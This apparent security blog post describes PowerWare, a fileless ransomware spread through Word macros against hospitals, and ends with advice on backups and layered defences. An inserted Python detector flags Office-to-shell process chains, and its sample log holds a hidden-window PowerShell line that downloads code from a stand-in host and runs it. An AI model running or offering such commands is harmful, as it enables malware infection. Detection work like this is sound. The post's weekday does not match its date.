Fri, 30 May 2016

PowerWare – A Fileless Ransomware Targeting Hospitals


While businesses of all sizes, government organisations and individuals have all fallen victim to ransomware, it appears that cyber criminals have found 'the sweet spot' and are consolidating their efforts to exploit this very lucrative vulnerability in hospitals and healthcare organisations.


Because they provide critical care, the healthcare sector places high importance on having real-time, up-to-date medical records of their patients. Without these medical records, surgeons would be unable to proceed with life-saving operations, and nurses would not know which medicines to prepare for patients. In short, the workflow of hospitals and other healthcare institutions would be severely disrupted and sick patients would not be able to receive the care they need. Any delay could be a matter of life or death, and thus hospitals are more inclined to pay the ransom in the event of a ransomware attack.


This urgency and necessity for hospitals and healthcare organisations to recover encrypted files makes them the perfect target for ransomware hackers, and hackers are sparing no effort in capitalising on this weakness. PowerWare is a prime example of such malware.


Discovered in April 2016, PowerWare is a new strain of ransomware that has been used for launching attacks on hospitals and healthcare organisations. The most interesting and differentiating feature of this malware is that it is fileless. While several existing families of malware are also fileless, this is uncommon in ransomware.


Its fileless nature also helps the ransomware to evade detection. This is because PowerWare operates without writing any files to the computer's disk, thus making it difficult for security software to scan and detect it.


This is a telling sign that hackers are constantly improving their craft and becoming increasingly sophisticated. For us, the common users and organisations, it serves as a gentle reminder to never let our guard down.


To effectively protect against this malware, we must first understand how it works. So, how exactly does this fileless ransomware infect a computer? In order to infiltrate and infect the user's system, PowerWare abuses the macro function of Microsoft Word. Through spam campaigns, hackers disseminate email messages with an attached Word document disguised, for example, as an invoice.

[Image: example of PowerWare]

In order to open this attachment, the user has to enable macros on his or her computer. While this seems an innocuous course of action, enabling macros in Word will cause PowerShell (the native Windows scripting and task-automation framework) to download the malicious script automatically. Because nothing is written to disk, the malware blends in inconspicuously with legitimate activity on the computer and thus avoids detection. That is, until the warning message demanding a hefty ransom appears.
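The infection chain described above leaves one signal that does not depend on a file touching disk: a Word process spawning PowerShell. The following is an added example, not code from the original post or from Quann, of detection logic a defender could run over process-creation telemetry. The log format is a constructed, simplified "Key=Value|Key=Value" record whose field names (Image, ParentImage, CommandLine) are modelled on Sysmon Event ID 1; the sample lines, the example.invalid URL and the heuristic list of command-line traits are all assumptions made for the example.

```python
"""Flag Office applications that spawn a shell or script interpreter.

Added example (not from the original post). The parent/child pair
"winword.exe -> powershell.exe" is the durable indicator of a macro dropper
such as PowerWare; command-line traits typical of download-and-execute
one-liners raise the severity. Log lines below are constructed, not real.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Office applications whose macros should not normally start shells.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Interpreters commonly used as the second stage of a macro dropper.
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# (label, case-insensitive regex) pairs; heuristic list assumed for the example.
SUSPICIOUS_ARGS = [
    ("encoded command", re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)(\s|$)", re.I)),
    ("hidden window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("no profile", re.compile(r"-nop(rofile)?\b", re.I)),
    ("bypass policy", re.compile(r"-ex(ecutionpolicy)?\s+bypass", re.I)),
    ("web download", re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I)),
    ("invoke-expression", re.compile(r"\biex\b|invoke-expression", re.I)),
]


@dataclass
class Finding:
    parent: str
    child: str
    reasons: list = field(default_factory=list)

    @property
    def severity(self) -> str:
        # An Office parent alone warrants an alert; extra traits make it high.
        return "high" if len(self.reasons) > 1 else "medium"


def parse_event(line: str) -> dict:
    """Split 'Key=Value|Key=Value' into a dict; values may contain spaces."""
    return dict(part.split("=", 1) for part in line.strip().split("|") if "=" in part)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> Optional[Finding]:
    """Return a Finding for an Office->shell chain, else None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SHELL_CHILDREN:
        return None  # ordinary process tree, nothing to report
    finding = Finding(parent, child, [f"{parent} spawned {child}"])
    cmdline = event.get("CommandLine", "")
    for label, pattern in SUSPICIOUS_ARGS:
        if pattern.search(cmdline):
            finding.reasons.append(label)
    return finding


def scan(lines):
    """Evaluate every non-empty log line and keep the findings."""
    return [f for f in (evaluate(parse_event(ln)) for ln in lines if ln.strip()) if f]


# Constructed sample events (not real telemetry).
SAMPLE_LOG = """
EventID=1|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=powershell.exe
EventID=1|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage=C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE|CommandLine=powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
EventID=1|Image=C:\\Windows\\System32\\cmd.exe|ParentImage=C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE|CommandLine=cmd.exe /c echo hello
EventID=1|Image=C:\\Windows\\System32\\notepad.exe|ParentImage=C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE|CommandLine=notepad.exe
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"[{f.severity}] {'; '.join(f.reasons)}")
```

Run against the constructed log, the Word-to-PowerShell line is reported as high severity (hidden window, no profile, bypass policy, web download and invoke-expression all match), the Excel-to-cmd line as medium, and the explorer and notepad lines produce nothing. In a real environment the same logic would sit over Sysmon or Windows 4688 process-creation events, with the parent/child test doing the work and the command-line traits serving only to prioritise.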


Ransomware is on the rise, and the high payoff will only attract more cyber criminals to jump on the bandwagon. With the ever-growing number of ransomware cases, many cyber security experts have raised the red flag on this issue. Ransomware is a particularly difficult problem to combat, but it is not impossible to protect yourself and your organisation from these attacks. The most reliable safeguard is conducting regular backups that are as close to real-time as possible. By doing so, you will be able to restore the infected system with few complications.


Additionally, to further prevent your systems from being infiltrated again, deploy a layered approach using anti-virus software, web filtering and firewalls – and be sure to keep these programmes up to date! As cyber criminals of the nefarious underworld get smarter, more sophisticated and professional, it is crucial that users and organisations also become more vigilant in protecting their data.

© 2017 Quann